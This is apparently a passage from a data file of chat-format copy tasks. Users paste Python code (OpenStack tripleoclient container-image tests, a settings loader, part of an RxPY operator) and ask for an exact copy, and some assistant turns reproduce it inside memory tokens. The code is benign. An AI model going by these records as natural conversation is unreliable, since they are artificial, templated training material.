self.addCleanup(self.run_ansible_playbook.stop)\n self.buildah_build_all = mock.patch(\n \"tripleo_common.image.builder.buildah.BuildahBuilder.build_all\",\n autospec=True,\n )\n self.mock_buildah = self.buildah_build_all.start()\n self.addCleanup(self.buildah_build_all.stop)\n self.cmd = tcib.Build(self.app, None)\n\n def _take_action(self, parsed_args):\n self.cmd.image_parents = {\"keystone\": \"base\"}\n mock_open = mock.mock_open(read_data=IMAGE_YAML)\n with mock.patch(\"os.path.isfile\", autospec=True) as mock_isfile:\n mock_isfile.return_value = True\n with mock.patch(\"os.path.isdir\", autospec=True) as mock_isdir:\n mock_isdir.return_value = True\n with mock.patch('six.moves.builtins.open', mock_open):\n with mock.patch(\n \"tripleoclient.v2.tripleo_container_image.Build\"\n \".find_image\",\n autospec=True,\n ) as mock_find_image:\n mock_find_image.return_value = {\"tcib_option\": \"data\"}\n self.cmd.take_action(parsed_args)\n\n def test_find_image(self):\n mock_open = mock.mock_open(read_data='---\\ntcib_option: \"data\"')\n with mock.patch('six.moves.builtins.open', mock_open):\n image = self.cmd.find_image(\"keystone\", \"some/path\", \"base-image\")\n self.assertEqual(image, {\"tcib_option\": \"data\"})\n\n def test_build_tree(self):\n image = self.cmd.build_tree(\"some/path\")\n self.assertEqual(\n image,\n [\n {\n \"base\": [\n \"memcached\",\n {\n \"openstack\": [\n \"glance\",\n \"keystone\",\n {\"neutron\": [\"api\"]},\n \"nova\",\n ]\n },\n ]\n }\n ],\n )\n\n def test_image_regex(self):\n image = self.cmd.imagename_to_regex(\"test/centos-binary-keystone:tag\")\n self.assertEqual(image, \"keystone\")\n image = self.cmd.imagename_to_regex(\"test/rhel-binary-keystone:tag\")\n self.assertEqual(image, \"keystone\")\n image = self.cmd.imagename_to_regex(\"test/rhel-source-keystone:tag\")\n self.assertEqual(image, \"keystone\")\n image = self.cmd.imagename_to_regex(\"test/rhel-rdo-keystone:tag\")\n self.assertEqual(image, \"keystone\")\n image = self.cmd.imagename_to_regex(\"test/rhel-rhos-keystone:tag\")\n self.assertEqual(image, \"keystone\")\n image = self.cmd.imagename_to_regex(\"test/other-keystone:tag\")\n self.assertEqual(image, \"other-keystone\")\n\n def test_rectify_excludes(self):\n self.cmd.identified_images = [\"keystone\", \"nova\", \"glance\"]\n excludes = self.cmd.rectify_excludes(images_to_prepare=[\"glance\"])\n self.assertEqual(excludes, [\"keystone\", \"nova\"])\n\n def test_image_build_yaml(self):\n arglist = [\"--config-file\", \"config.yaml\"]\n verifylist = [(\"config_file\", \"config.yaml\")]\n\n parsed_args = self.check_parser(self.cmd, arglist, verifylist)\n\n self._take_action(parsed_args=parsed_args)\n\n assert self.mock_buildah.called\n\n def test_image_build_with_skip_build(self):\n arglist = [\"--config-file\", \"config.yaml\", \"--skip-build\"]\n verifylist = [(\"config_file\", \"config.yaml\"), (\"skip_build\", True)]\n\n parsed_args = self.check_parser(self.cmd, arglist, verifylist)\n\n self._take_action(parsed_args=parsed_args)\n\n assert not self.mock_buildah.called\n\n def test_image_build_with_push(self):\n arglist = [\"--config-file\", \"config.yaml\", \"--push\"]\n verifylist = [(\"config_file\", \"config.yaml\"), (\"push\", True)]\n\n parsed_args = self.check_parser(self.cmd, arglist, verifylist)\n\n self._take_action(parsed_args=parsed_args)\n\n assert self.mock_buildah.called\n\n def test_image_build_with_volume(self):\n arglist = [\"--config-file\", \"config.yaml\", \"--volume\", \"bind/mount\"]\n verifylist = [\n (\"config_file\", \"config.yaml\"),\n (\n \"volumes\",\n [\n \"/etc/yum.repos.d:/etc/distro.repos.d:z\",\n \"/etc/pki/rpm-gpg:/etc/pki/rpm-gpg:z\",\n \"bind/mount\",\n ],\n ),\n ]\n\n parsed_args = self.check_parser(self.cmd, arglist, verifylist)\n\n self._take_action(parsed_args=parsed_args)\n\n assert self.mock_buildah.called\n\n def test_image_build_with_exclude(self):\n arglist = [\"--exclude\", \"image1\"]\n verifylist = [\n (\"excludes\", [\"image1\"]),\n ]\n\n parsed_args = self.check_parser(self.cmd, arglist, verifylist)\n\n self._take_action(parsed_args=parsed_args)\n\n assert self.mock_buildah.called\n\n def test_image_build_failure_no_config_file(self):\n arglist = [\"--config-file\", \"not-a-file-config.yaml\"]\n verifylist = [\n (\"config_file\", \"not-a-file-config.yaml\"),\n ]\n\n self.check_parser(self.cmd, arglist, verifylist)\n\n def test_image_build_config_dir(self):\n arglist = [\"--config-file\", \"config.yaml\", \"--config-path\", \"/foo\"]\n verifylist = [(\"config_file\", \"config.yaml\"), (\"config_path\", \"/foo\")]\n\n parsed_args = self.check_parser(self.cmd, arglist, verifylist)\n\n self._take_action(parsed_args=parsed_args)\n self.assertEqual(self.cmd.tcib_config_path, '/foo/tcib')\n\n def test_image_build_failure_no_config_dir(self):\n arglist = [\"--config-path\", \"not-a-path\"]\n verifylist = [\n (\"config_path\", \"not-a-path\"),\n ]\n\n parsed_args = self.check_parser(self.cmd, arglist, verifylist)\n\n with mock.patch(\"os.path.isfile\", autospec=True) as mock_isfile:\n mock_isfile.return_value = True\n self.assertRaises(IOError, self.cmd.take_action, parsed_args)\n\n def test_process_images(self):\n rtn_value = {'yay': 'values'}\n arglist = [\"--config-path\", \"foobar/\"]\n verifylist = [\n (\"config_path\", \"foobar/\"),\n ]\n\n parsed_args = self.check_parser(self.cmd, arglist, verifylist)\n\n expected_images = ['foo', 'foobar']\n image_configs = {}\n self.cmd.tcib_config_path = '/foo/tcib'\n with mock.patch(\"tripleoclient.v2.tripleo_container_image.Build\"\n \".find_image\", autospec=True) as mock_find_image:\n\n mock_find_image.return_value = rtn_value\n cfgs = self.cmd.process_images(expected_images, parsed_args,\n image_configs)\n mock_find_image.assert_called_once_with(self.cmd, 'foo',\n '/foo/tcib', 'ubi8')\n self.assertEqual(cfgs, {'foo': rtn_value})\n\n\nclass TestContainerImagesHotfix(deploy_fakes.TestDeployOvercloud):\n def setUp(self):\n super(TestContainerImagesHotfix, self).setUp()\n self.run_ansible_playbook = mock.patch(\n \"tripleoclient.utils.run_ansible_playbook\", autospec=True\n )\n self.run_ansible_playbook.start()\n self.addCleanup(self.run_ansible_playbook.stop)\n self.cmd = tcib.HotFix(self.app, None)\n\n def _take_action(self, parsed_args):\n with mock.patch(\"os.path.isfile\", autospec=True) as mock_isfile:\n mock_isfile.return_value = True\n self.cmd.take_action(parsed_args)\n\n def test_image_hotfix(self):\n arglist = [\"--image\", \"container1\", \"--rpms-path\", \"/opt\"]\n verifylist = [\n (\"images\", [\"container1\"]),\n (\"rpms_path\", \"/opt\"),\n ]\n\n parsed_args = self.check_parser(self.cmd, arglist, verifylist)\n self._take_action(parsed_args=parsed_args)\n\n def test_image_hotfix_multi_image(self):\n arglist = [\n \"--image\",\n \"container1\",\n \"--image\",\n \"container2\",\n \"--rpms-path\",\n \"/opt\",\n ]\n verifylist = [\n (\"images\", [\"container1\", \"container2\"]),\n (\"rpms_path\", \"/opt\"),\n ]\n\n parsed_args = self.check_parser(self.cmd, arglist, verifylist)\n self._take_action(parsed_args=parsed_args)\n\n def test_image_hotfix_missing_args(self):\n arglist = []\n verifylist = []\n\n self.assertRaises(\n deploy_fakes.fakes.utils.ParserException,\n self.check_parser,\n self.cmd,\n arglist,\n verifylist,\n )\n```\nOutput it precisely.",
"role": "user"
}
] |
[
{
"content": "Here is the code block:\n<|memory_start|>```python\n# Copyright 2016 Red Hat, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n\nimport mock\n\nfrom tripleoclient.tests import fakes\nfrom tripleoclient.tests.v1.overcloud_deploy import fakes as deploy_fakes\nfrom tripleoclient.v2 import tripleo_container_image as tcib\n\n\nIMAGE_YAML = \"\"\"---\ncontainer_images:\n - image_source: \"tripleo\"\n imagename: \"test/keystone:tag\"\n\"\"\"\n\nMOCK_WALK = [\n (\"\", [\"base\"], [],),\n (\"/base\", [\"memcached\", \"openstack\"], [\"config.yaml\", \"test.doc\"],),\n (\"/base/memcached\", [], [\"memcached.yaml\"],),\n (\"/base/openstack\", [\"glance\", \"keystone\", \"neutron\", \"nova\"], [],),\n (\n \"/base/openstack/glance\",\n [],\n [\"glance-registry.yaml\", \"glance-api.yaml\"],\n ),\n (\"/base/openstack/keystone\", [], [\"keystone.yaml\"],),\n (\"/base/openstack/neutron\", [\"api\"], [],),\n (\"/base/openstack/neutron/api\", [], [\"neutron-api.yml\"],),\n (\"/base/openstack/nova\", [], [],),\n]\n\n\nclass TestContainerImages(deploy_fakes.TestDeployOvercloud):\n def setUp(self):\n super(TestContainerImages, self).setUp()\n self.app = fakes.FakeApp()\n self.os_walk = mock.patch(\n \"os.walk\", autospec=True, return_value=iter(MOCK_WALK)\n )\n self.os_walk.start()\n self.addCleanup(self.os_walk.stop)\n self.os_listdir = mock.patch(\n \"os.listdir\", autospec=True, return_value=[\"config.yaml\"]\n )\n self.os_listdir.start()\n self.addCleanup(self.os_listdir.stop)\n self.run_ansible_playbook = mock.patch(\n \"tripleoclient.utils.run_ansible_playbook\", autospec=True\n )\n self.run_ansible_playbook.start()\n self.addCleanup(self.run_ansible_playbook.stop)\n self.buildah_build_all = mock.patch(\n \"tripleo_common.image.builder.buildah.BuildahBuilder.build_all\",\n autospec=True,\n )\n self.mock_buildah = self.buildah_build_all.start()\n self.addCleanup(self.buildah_build_all.stop)\n self.cmd = tcib.Build(self.app, None)\n\n def _take_action(self, parsed_args):\n self.cmd.image_parents = {\"keystone\": \"base\"}\n mock_open = mock.mock_open(read_data=IMAGE_YAML)\n with mock.patch(\"os.path.isfile\", autospec=True) as mock_isfile:\n mock_isfile.return_value = True\n with mock.patch(\"os.path.isdir\", autospec=True) as mock_isdir:\n mock_isdir.return_value = True\n with mock.patch('six.moves.builtins.open', mock_open):\n with mock.patch(\n \"tripleoclient.v2.tripleo_container_image.Build\"\n \".find_image\",\n autospec=True,\n ) as mock_find_image:\n mock_find_image.return_value = {\"tcib_option\": \"data\"}\n self.cmd.take_action(parsed_args)\n\n def test_find_image(self):\n mock_open = mock.mock_open(read_data='---\\ntcib_option: \"data\"')\n with mock.patch('six.moves.builtins.open', mock_open):\n image = self.cmd.find_image(\"keystone\", \"some/path\", \"base-image\")\n self.assertEqual(image, {\"tcib_option\": \"data\"})\n\n def test_build_tree(self):\n image = self.cmd.build_tree(\"some/path\")\n self.assertEqual(\n image,\n [\n {\n \"base\": [\n \"memcached\",\n {\n \"openstack\": [\n \"glance\",\n \"keystone\",\n {\"neutron\": [\"api\"]},\n \"nova\",\n ]\n },\n ]\n }\n ],\n )\n\n def test_image_regex(self):\n image = self.cmd.imagename_to_regex(\"test/centos-binary-keystone:tag\")\n self.assertEqual(image, \"keystone\")\n image = self.cmd.imagename_to_regex(\"test/rhel-binary-keystone:tag\")\n self.assertEqual(image, \"keystone\")\n image = self.cmd.imagename_to_regex(\"test/rhel-source-keystone:tag\")\n self.assertEqual(image, \"keystone\")\n image = self.cmd.imagename_to_regex(\"test/rhel-rdo-keystone:tag\")\n self.assertEqual(image, \"keystone\")\n image = self.cmd.imagename_to_regex(\"test/rhel-rhos-keystone:tag\")\n self.assertEqual(image, \"keystone\")\n image = self.cmd.imagename_to_regex(\"test/other-keystone:tag\")\n self.assertEqual(image, \"other-keystone\")\n\n def test_rectify_excludes(self):\n self.cmd.identified_images = [\"keystone\", \"nova\", \"glance\"]\n excludes = self.cmd.rectify_excludes(images_to_prepare=[\"glance\"])\n self.assertEqual(excludes, [\"keystone\", \"nova\"])\n\n def test_image_build_yaml(self):\n arglist = [\"--config-file\", \"config.yaml\"]\n verifylist = [(\"config_file\", \"config.yaml\")]\n\n parsed_args = self.check_parser(self.cmd, arglist, verifylist)\n\n self._take_action(parsed_args=parsed_args)\n\n assert self.mock_buildah.called\n\n def test_image_build_with_skip_build(self):\n arglist = [\"--config-file\", \"config.yaml\", \"--skip-build\"]\n verifylist = [(\"config_file\", \"config.yaml\"), (\"skip_build\", True)]\n\n parsed_args = self.check_parser(self.cmd, arglist, verifylist)\n\n self._take_action(parsed_args=parsed_args)\n\n assert not self.mock_buildah.called\n\n def test_image_build_with_push(self):\n arglist = [\"--config-file\", \"config.yaml\", \"--push\"]\n verifylist = [(\"config_file\", \"config.yaml\"), (\"push\", True)]\n\n parsed_args = self.check_parser(self.cmd, arglist, verifylist)\n\n self._take_action(parsed_args=parsed_args)\n\n assert self.mock_buildah.called\n\n def test_image_build_with_volume(self):\n arglist = [\"--config-file\", \"config.yaml\", \"--volume\", \"bind/mount\"]\n verifylist = [\n (\"config_file\", \"config.yaml\"),\n (\n \"volumes\",\n [\n \"/etc/yum.repos.d:/etc/distro.repos.d:z\",\n \"/etc/pki/rpm-gpg:/etc/pki/rpm-gpg:z\",\n \"bind/mount\",\n ],\n ),\n ]\n\n parsed_args = self.check_parser(self.cmd, arglist, verifylist)\n\n self._take_action(parsed_args=parsed_args)\n\n assert self.mock_buildah.called\n\n def test_image_build_with_exclude(self):\n arglist = [\"--exclude\", \"image1\"]\n verifylist = [\n (\"excludes\", [\"image1\"]),\n ]\n\n parsed_args = self.check_parser(self.cmd, arglist, verifylist)\n\n self._take_action(parsed_args=parsed_args)\n\n assert self.mock_buildah.called\n\n def test_image_build_failure_no_config_file(self):\n arglist = [\"--config-file\", \"not-a-file-config.yaml\"]\n verifylist = [\n (\"config_file\", \"not-a-file-config.yaml\"),\n ]\n\n self.check_parser(self.cmd, arglist, verifylist)\n\n def test_image_build_config_dir(self):\n arglist = [\"--config-file\", \"config.yaml\", \"--config-path\", \"/foo\"]\n verifylist = [(\"config_file\", \"config.yaml\"), (\"config_path\", \"/foo\")]\n\n parsed_args = self.check_parser(self.cmd, arglist, verifylist)\n\n self._take_action(parsed_args=parsed_args)\n self.assertEqual(self.cmd.tcib_config_path, '/foo/tcib')\n\n def test_image_build_failure_no_config_dir(self):\n arglist = [\"--config-path\", \"not-a-path\"]\n verifylist = [\n (\"config_path\", \"not-a-path\"),\n ]\n\n parsed_args = self.check_parser(self.cmd, arglist, verifylist)\n\n with mock.patch(\"os.path.isfile\", autospec=True) as mock_isfile:\n mock_isfile.return_value = True\n self.assertRaises(IOError, self.cmd.take_action, parsed_args)\n\n def test_process_images(self):\n rtn_value = {'yay': 'values'}\n arglist = [\"--config-path\", \"foobar/\"]\n verifylist = [\n (\"config_path\", \"foobar/\"),\n ]\n\n parsed_args = self.check_parser(self.cmd, arglist, verifylist)\n\n expected_images = ['foo', 'foobar']\n image_configs = {}\n self.cmd.tcib_config_path = '/foo/tcib'\n with mock.patch(\"tripleoclient.v2.tripleo_container_image.Build\"\n \".find_image\", autospec=True) as mock_find_image:\n\n mock_find_image.return_value = rtn_value\n cfgs = self.cmd.process_images(expected_images, parsed_args,\n image_configs)\n mock_find_image.assert_called_once_with(self.cmd, 'foo',\n '/foo/tcib', 'ubi8')\n self.assertEqual(cfgs, {'foo': rtn_value})\n\n\nclass TestContainerImagesHotfix(deploy_fakes.TestDeployOvercloud):\n def setUp(self):\n super(TestContainerImagesHotfix, self).setUp()\n self.run_ansible_playbook = mock.patch(\n \"tripleoclient.utils.run_ansible_playbook\", autospec=True\n )\n self.run_ansible_playbook.start()\n self.addCleanup(self.run_ansible_playbook.stop)\n self.cmd = tcib.HotFix(self.app, None)\n\n def _take_action(self, parsed_args):\n with mock.patch(\"os.path.isfile\", autospec=True) as mock_isfile:\n mock_isfile.return_value = True\n self.cmd.take_action(parsed_args)\n\n def test_image_hotfix(self):\n arglist = [\"--image\", \"container1\", \"--rpms-path\", \"/opt\"]\n verifylist = [\n (\"images\", [\"container1\"]),\n (\"rpms_path\", \"/opt\"),\n ]\n\n parsed_args = self.check_parser(self.cmd, arglist, verifylist)\n self._take_action(parsed_args=parsed_args)\n\n def test_image_hotfix_multi_image(self):\n arglist = [\n \"--image\",\n \"container1\",\n \"--image\",\n \"container2\",\n \"--rpms-path\",\n \"/opt\",\n ]\n verifylist = [\n (\"images\", [\"container1\", \"container2\"]),\n (\"rpms_path\", \"/opt\"),\n ]\n\n parsed_args = self.check_parser(self.cmd, arglist, verifylist)\n self._take_action(parsed_args=parsed_args)\n\n def test_image_hotfix_missing_args(self):\n arglist = []\n verifylist = []\n\n self.assertRaises(\n deploy_fakes.fakes.utils.ParserException,\n self.check_parser,\n self.cmd,\n arglist,\n verifylist,\n )\n```<|memory_end|>\nOutput it precisely.",
"role": "user"
}
] |
```python
# Copyright 2016 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import mock
from tripleoclient.tests import fakes
from tripleoclient.tests.v1.overcloud_deploy import fakes as deploy_fakes
from tripleoclient.v2 import tripleo_container_image as tcib
IMAGE_YAML = """---
container_images:
- image_source: "tripleo"
imagename: "test/keystone:tag"
"""
MOCK_WALK = [
("", ["base"], [],),
("/base", ["memcached", "openstack"], ["config.yaml", "test.doc"],),
("/base/memcached", [], ["memcached.yaml"],),
("/base/openstack", ["glance", "keystone", "neutron", "nova"], [],),
(
"/base/openstack/glance",
[],
["glance-registry.yaml", "glance-api.yaml"],
),
("/base/openstack/keystone", [], ["keystone.yaml"],),
("/base/openstack/neutron", ["api"], [],),
("/base/openstack/neutron/api", [], ["neutron-api.yml"],),
("/base/openstack/nova", [], [],),
]
class TestContainerImages(deploy_fakes.TestDeployOvercloud):
def setUp(self):
super(TestContainerImages, self).setUp()
self.app = fakes.FakeApp()
self.os_walk = mock.patch(
"os.walk", autospec=True, return_value=iter(MOCK_WALK)
)
self.os_walk.start()
self.addCleanup(self.os_walk.stop)
self.os_listdir = mock.patch(
"os.listdir", autospec=True, return_value=["config.yaml"]
)
self.os_listdir.start()
self.addCleanup(self.os_listdir.stop)
self.run_ansible_playbook = mock.patch(
"tripleoclient.utils.run_ansible_playbook", autospec=True
)
self.run_ansible_playbook.start()
self.addCleanup(self.run_ansible_playbook.stop)
self.buildah_build_all = mock.patch(
"tripleo_common.image.builder.buildah.BuildahBuilder.build_all",
autospec=True,
)
self.mock_buildah = self.buildah_build_all.start()
self.addCleanup(self.buildah_build_all.stop)
self.cmd = tcib.Build(self.app, None)
def _take_action(self, parsed_args):
self.cmd.image_parents = {"keystone": "base"}
mock_open = mock.mock_open(read_data=IMAGE_YAML)
with mock.patch("os.path.isfile", autospec=True) as mock_isfile:
mock_isfile.return_value = True
with mock.patch("os.path.isdir", autospec=True) as mock_isdir:
mock_isdir.return_value = True
with mock.patch('six.moves.builtins.open', mock_open):
with mock.patch(
"tripleoclient.v2.tripleo_container_image.Build"
".find_image",
autospec=True,
) as mock_find_image:
mock_find_image.return_value = {"tcib_option": "data"}
self.cmd.take_action(parsed_args)
def test_find_image(self):
mock_open = mock.mock_open(read_data='---\ntcib_option: "data"')
with mock.patch('six.moves.builtins.open', mock_open):
image = self.cmd.find_image("keystone", "some/path", "base-image")
self.assertEqual(image, {"tcib_option": "data"})
def test_build_tree(self):
image = self.cmd.build_tree("some/path")
self.assertEqual(
image,
[
{
"base": [
"memcached",
{
"openstack": [
"glance",
"keystone",
{"neutron": ["api"]},
"nova",
]
},
]
}
],
)
def test_image_regex(self):
image = self.cmd.imagename_to_regex("test/centos-binary-keystone:tag")
self.assertEqual(image, "keystone")
image = self.cmd.imagename_to_regex("test/rhel-binary-keystone:tag")
self.assertEqual(image, "keystone")
image = self.cmd.imagename_to_regex("test/rhel-source-keystone:tag")
self.assertEqual(image, "keystone")
image = self.cmd.imagename_to_regex("test/rhel-rdo-keystone:tag")
self.assertEqual(image, "keystone")
image = self.cmd.imagename_to_regex("test/rhel-rhos-keystone:tag")
self.assertEqual(image, "keystone")
image = self.cmd.imagename_to_regex("test/other-keystone:tag")
self.assertEqual(image, "other-keystone")
def test_rectify_excludes(self):
self.cmd.identified_images = ["keystone", "nova", "glance"]
excludes = self.cmd.rectify_excludes(images_to_prepare=["glance"])
self.assertEqual(excludes, ["keystone", "nova"])
def test_image_build_yaml(self):
arglist = ["--config-file", "config.yaml"]
verifylist = [("config_file", "config.yaml")]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self._take_action(parsed_args=parsed_args)
assert self.mock_buildah.called
def test_image_build_with_skip_build(self):
arglist = ["--config-file", "config.yaml", "--skip-build"]
verifylist = [("config_file", "config.yaml"), ("skip_build", True)]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self._take_action(parsed_args=parsed_args)
assert not self.mock_buildah.called
def test_image_build_with_push(self):
arglist = ["--config-file", "config.yaml", "--push"]
verifylist = [("config_file", "config.yaml"), ("push", True)]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self._take_action(parsed_args=parsed_args)
assert self.mock_buildah.called
def test_image_build_with_volume(self):
arglist = ["--config-file", "config.yaml", "--volume", "bind/mount"]
verifylist = [
("config_file", "config.yaml"),
(
"volumes",
[
"/etc/yum.repos.d:/etc/distro.repos.d:z",
"/etc/pki/rpm-gpg:/etc/pki/rpm-gpg:z",
"bind/mount",
],
),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self._take_action(parsed_args=parsed_args)
assert self.mock_buildah.called
def test_image_build_with_exclude(self):
arglist = ["--exclude", "image1"]
verifylist = [
("excludes", ["image1"]),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self._take_action(parsed_args=parsed_args)
assert self.mock_buildah.called
def test_image_build_failure_no_config_file(self):
arglist = ["--config-file", "not-a-file-config.yaml"]
verifylist = [
("config_file", "not-a-file-config.yaml"),
]
self.check_parser(self.cmd, arglist, verifylist)
def test_image_build_config_dir(self):
arglist = ["--config-file", "config.yaml", "--config-path", "/foo"]
verifylist = [("config_file", "config.yaml"), ("config_path", "/foo")]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self._take_action(parsed_args=parsed_args)
self.assertEqual(self.cmd.tcib_config_path, '/foo/tcib')
def test_image_build_failure_no_config_dir(self):
arglist = ["--config-path", "not-a-path"]
verifylist = [
("config_path", "not-a-path"),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
with mock.patch("os.path.isfile", autospec=True) as mock_isfile:
mock_isfile.return_value = True
self.assertRaises(IOError, self.cmd.take_action, parsed_args)
def test_process_images(self):
rtn_value = {'yay': 'values'}
arglist = ["--config-path", "foobar/"]
verifylist = [
("config_path", "foobar/"),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
expected_images = ['foo', 'foobar']
image_configs = {}
self.cmd.tcib_config_path = '/foo/tcib'
with mock.patch("tripleoclient.v2.tripleo_container_image.Build"
".find_image", autospec=True) as mock_find_image:
mock_find_image.return_value = rtn_value
cfgs = self.cmd.process_images(expected_images, parsed_args,
image_configs)
mock_find_image.assert_called_once_with(self.cmd, 'foo',
'/foo/tcib', 'ubi8')
self.assertEqual(cfgs, {'foo': rtn_value})
class TestContainerImagesHotfix(deploy_fakes.TestDeployOvercloud):
def setUp(self):
super(TestContainerImagesHotfix, self).setUp()
self.run_ansible_playbook = mock.patch(
"tripleoclient.utils.run_ansible_playbook", autospec=True
)
self.run_ansible_playbook.start()
self.addCleanup(self.run_ansible_playbook.stop)
self.cmd = tcib.HotFix(self.app, None)
def _take_action(self, parsed_args):
with mock.patch("os.path.isfile", autospec=True) as mock_isfile:
mock_isfile.return_value = True
self.cmd.take_action(parsed_args)
def test_image_hotfix(self):
arglist = ["--image", "container1", "--rpms-path", "/opt"]
verifylist = [
("images", ["container1"]),
("rpms_path", "/opt"),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self._take_action(parsed_args=parsed_args)
def test_image_hotfix_multi_image(self):
arglist = [
"--image",
"container1",
"--image",
"container2",
"--rpms-path",
"/opt",
]
verifylist = [
("images", ["container1", "container2"]),
("rpms_path", "/opt"),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self._take_action(parsed_args=parsed_args)
def test_image_hotfix_missing_args(self):
arglist = []
verifylist = []
self.assertRaises(
deploy_fakes.fakes.utils.ParserException,
self.check_parser,
self.cmd,
arglist,
verifylist,
)
```
|
[
{
"content": "```python\nimport os\nimport importlib\nfrom gmc.conf import global_settings\n\nENVIRONMENT_VARIABLE = \"GMC_SETTINGS_MODULE\"\nclass Settings:\n \"\"\"\n Module to load settings to configure gmc\n \"\"\"\n def __init__(self, *args, **kwargs):\n self.settings = None\n self.settings_module = None\n\n def __getattr__(self, name):\n \"\"\"\n Make settings available as the attributes.\n Like settings.DATASET_DIR\n \"\"\"\n self.load_settings()\n return self.settings[name]\n\n def __iter__(self):\n self.load_settings()\n return iter(self.settings)\n\n def load_settings(self):\n settings_module = os.environ.get(ENVIRONMENT_VARIABLE)\n if self.settings is not None and settings_module == self.settings_module:\n return\n\n self.settings = {}\n for setting in dir(global_settings):\n if setting.isupper():\n self.settings[setting] = getattr(global_settings, setting)\n self.settings_module = os.environ.get(ENVIRONMENT_VARIABLE, None)\n \n if self.settings_module is not None:\n mod = importlib.import_module(self.settings_module)\n\n for setting in dir(mod):\n if setting.isupper():\n self.settings[setting] = getattr(mod, setting)\n\n def modify(self, new_settings):\n for name in new_settings:\n if name in self.settings:\n self.settings[name] = new_settings[name]\n\nsettings = Settings()\n```\nOutput an exact, unmodified copy of the code.",
"role": "user"
}
] |
[
{
"content": "<|memory_start|>```python\nimport os\nimport importlib\nfrom gmc.conf import global_settings\n\nENVIRONMENT_VARIABLE = \"GMC_SETTINGS_MODULE\"\nclass Settings:\n \"\"\"\n Module to load settings to configure gmc\n \"\"\"\n def __init__(self, *args, **kwargs):\n self.settings = None\n self.settings_module = None\n\n def __getattr__(self, name):\n \"\"\"\n Make settings available as the attributes.\n Like settings.DATASET_DIR\n \"\"\"\n self.load_settings()\n return self.settings[name]\n\n def __iter__(self):\n self.load_settings()\n return iter(self.settings)\n\n def load_settings(self):\n settings_module = os.environ.get(ENVIRONMENT_VARIABLE)\n if self.settings is not None and settings_module == self.settings_module:\n return\n\n self.settings = {}\n for setting in dir(global_settings):\n if setting.isupper():\n self.settings[setting] = getattr(global_settings, setting)\n self.settings_module = os.environ.get(ENVIRONMENT_VARIABLE, None)\n \n if self.settings_module is not None:\n mod = importlib.import_module(self.settings_module)\n\n for setting in dir(mod):\n if setting.isupper():\n self.settings[setting] = getattr(mod, setting)\n\n def modify(self, new_settings):\n for name in new_settings:\n if name in self.settings:\n self.settings[name] = new_settings[name]\n\nsettings = Settings()\n```<|memory_end|>\nOutput an exact, unmodified copy of the code.",
"role": "user"
}
] |
```python
import os
import importlib
from gmc.conf import global_settings
ENVIRONMENT_VARIABLE = "GMC_SETTINGS_MODULE"
class Settings:
"""
Module to load settings to configure gmc
"""
def __init__(self, *args, **kwargs):
self.settings = None
self.settings_module = None
def __getattr__(self, name):
"""
Make settings available as the attributes.
Like settings.DATASET_DIR
"""
self.load_settings()
return self.settings[name]
def __iter__(self):
self.load_settings()
return iter(self.settings)
def load_settings(self):
settings_module = os.environ.get(ENVIRONMENT_VARIABLE)
if self.settings is not None and settings_module == self.settings_module:
return
self.settings = {}
for setting in dir(global_settings):
if setting.isupper():
self.settings[setting] = getattr(global_settings, setting)
self.settings_module = os.environ.get(ENVIRONMENT_VARIABLE, None)
if self.settings_module is not None:
mod = importlib.import_module(self.settings_module)
for setting in dir(mod):
if setting.isupper():
self.settings[setting] = getattr(mod, setting)
def modify(self, new_settings):
for name in new_settings:
if name in self.settings:
self.settings[name] = new_settings[name]
settings = Settings()
```
|
[
{
"content": "```python\nimport collections\n\nfrom rx import AnonymousObservable, Observable\nfrom rx.disposables import CompositeDisposable\nfrom rx.internal import default_comparer\nfrom rx.internal import extensionmethod\n\n\n@extensionmethod(Observable)\ndef sequence_equal(self, second, comparer=None):\n \"\"\"Determines whether two sequences are equal by comparing the\n elements pairwise using a specified equality comparer.\n\n 1 - res = source.sequence_equal([1,2,3])\n 2 - res = source.sequence_equal([{ \"value\": 42 }], lambda x, y: x.value == y.value)\n 3 - res = source.sequence_equal(Observable.return_value(42))\n 4 - res = source.sequence_equal(Observable.return_value({ \"value\": 42 }), lambda x, y: x.value == y.value)\n\n second -- Second observable sequence or array to compare.\n comparer -- [Optional] Comparer used to compare elements of both sequences.\n\n Returns an observable sequence that contains a single element which\n indicates whether both sequences are of equal length and their\n corresponding elements are equal according to the specified equality\n comparer.\n \"\"\"\n\n first = self\n comparer = comparer or default_comparer\n\n if isinstance(second, collections.Iterable):\n second = Observable.from_iterable(second)\n\n def subscribe(observer):\n donel = [False]\n doner = [False]\n ql = []\n qr = []\n\n def on_next1(x):\n if len(qr) > 0:\n v = qr.pop(0)\n try:\n equal = comparer(v, x)\n except Exception as e:\n observer.on_error(e)\n return\n\n if not equal:\n observer.on_next(False)\n observer.on_completed()\n\n elif doner[0]:\n observer.on_next(False)\n observer.on_completed()\n else:\n ql.append(x)\n\n def on_completed1():\n donel[0] = True\n if not len(ql):\n if len(qr) > 0:\n observer.on_next(False)\n observer.on_completed()\n elif doner[0]:\n observer.on_next(True)\n observer.on_completed()\n\n def on_next2(x):\n if len(ql) > 0:\n v = ql.pop(0)\n try:\n equal = comparer(v, x)\n except Exception as exception:\n observer.on_error(exception)\n return\n\n if not equal:\n observer.on_next(False)\n 